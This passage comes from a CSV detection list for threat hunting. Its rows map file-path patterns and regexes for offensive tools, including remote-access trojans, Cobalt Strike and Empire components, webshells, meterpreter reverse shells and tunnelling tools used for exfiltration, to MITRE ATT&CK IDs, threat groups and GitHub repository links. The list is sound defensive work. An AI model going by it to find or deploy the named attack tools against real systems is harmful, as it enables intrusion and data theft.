Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12707"
"*/WMIPersistence.git*",".{0,1000}\/WMIPersistence\.git.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","12708"
"*/wmiquery.py*",".{0,1000}\/wmiquery\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12709"
"*/WMIReg.exe*",".{0,1000}\/WMIReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12710"
"*/WMIReg.exe*",".{0,1000}\/WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12711"
"*/wmisploit*",".{0,1000}\/wmisploit.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","12712"
"*/word_list.c",".{0,1000}\/word_list\.c","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12713"
"*/word_list.h",".{0,1000}\/word_list\.h","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12714"
"*/wordlists/combined_male_names.txt*",".{0,1000}\/wordlists\/combined_male_names\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12715"
"*/wordlists/familynames-usa-top1000.txt*",".{0,1000}\/wordlists\/familynames\-usa\-top1000\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12716"
"*/wordlists/femalenames-usa-top1000.txt*",".{0,1000}\/wordlists\/femalenames\-usa\-top1000\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12717"
"*/wordlists/malenames-usa-top1000.txt*",".{0,1000}\/wordlists\/malenames\-usa\-top1000\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12718"
"*/wordlists/names_quit_riot.txt*",".{0,1000}\/wordlists\/names_quit_riot\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12719"
"*/wordlists/owa_directories.txt*",".{0,1000}\/wordlists\/owa_directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","12720"
"*/wordlists/skype-directories.txt*",".{0,1000}\/wordlists\/skype\-directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","12721"
"*/wordlists/top_10000.txt*",".{0,1000}\/wordlists\/top_10000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","12722"
"*/wordlists/top_100000.txt*",".{0,1000}\/wordlists\/top_100000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","12723"
"*/workflow/test/dirbscan.yaml*",".{0,1000}\/workflow\/test\/dirbscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","12725"
"*/Worm.dll*",".{0,1000}\/Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12726"
"*/worm/inject.ps1*",".{0,1000}\/worm\/inject\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","12727"
"*/Worse Linux Shell.php*",".{0,1000}\/Worse\sLinux\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12728"
"*/wpaf/finder.py*",".{0,1000}\/wpaf\/finder\.py.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/kancotdiq/wpaf","1","0","#linux","N/A","N/A","1","80","15","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z","12729"
"*/wpscan.py*",".{0,1000}\/wpscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","12730"
"*/wraith.git*",".{0,1000}\/wraith\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12731"
"*/wraith.py*",".{0,1000}\/wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12732"
"*/wraith-master.zip*",".{0,1000}\/wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12733"
"*/wraith-RAT-payloads*",".{0,1000}\/wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12734"
"*/wraith-RAT-payloads.git*",".{0,1000}\/wraith\-RAT\-payloads\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12735"
"*/wraith-server.py*",".{0,1000}\/wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12736"
"*/wraith-server_v*.py*",".{0,1000}\/wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12737"
"*/WSAAcceptBackdoor.git*",".{0,1000}\/WSAAcceptBackdoor\.git.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","12738"
"*/wsdd-discover.nse*",".{0,1000}\/wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12739"
"*/ws-dirs.txt*",".{0,1000}\/ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","12740"
"*/ws-files.txt*",".{0,1000}\/ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","12741"
"*/WSMan-WinRM.git*",".{0,1000}\/WSMan\-WinRM\.git.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","12742"
"*/WSManWinRM.ps1*",".{0,1000}\/WSManWinRM\.ps1.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","12743"
"*/wso-webshell.git*",".{0,1000}\/wso\-webshell\.git.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","1","N/A","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","12744"
"*/WSPCoerce.git*",".{0,1000}\/WSPCoerce\.git.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","#linux","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","12745"
"*/wstunnel wstunnel*",".{0,1000}\/wstunnel\swstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12746"
"*/wstunnel.exe",".{0,1000}\/wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12747"
"*/wstunnel.git*",".{0,1000}\/wstunnel\.git.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12748"
"*/wstunnel/certs/*",".{0,1000}\/wstunnel\/certs\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12749"
"*/wstunnel:latest*",".{0,1000}\/wstunnel\:latest.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12750"
"*/wwlib/lolbins/*",".{0,1000}\/wwlib\/lolbins\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","12751"
"*/www/exploit.html*",".{0,1000}\/www\/exploit\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","12752"
"*/x11-access.nse*",".{0,1000}\/x11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12753"
"*/x64/meterpreter/reverse_tcp_rc4*",".{0,1000}\/x64\/meterpreter\/reverse_tcp_rc4.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12754"
"*/x64/Stardust.asm*",".{0,1000}\/x64\/Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","12755"
"*/x64_slim.dll*",".{0,1000}\/x64_slim\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12756"
"*/xan7r/kerberoast*",".{0,1000}\/xan7r\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","12759"
"*/xar-1.5.2.tar.gz*",".{0,1000}\/xar\-1\.5\.2\.tar\.gz.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12760"
"*/xdmcp-discover.nse*",".{0,1000}\/xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12761"
"*/xen-mimi.ps1*",".{0,1000}\/xen\-mimi\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 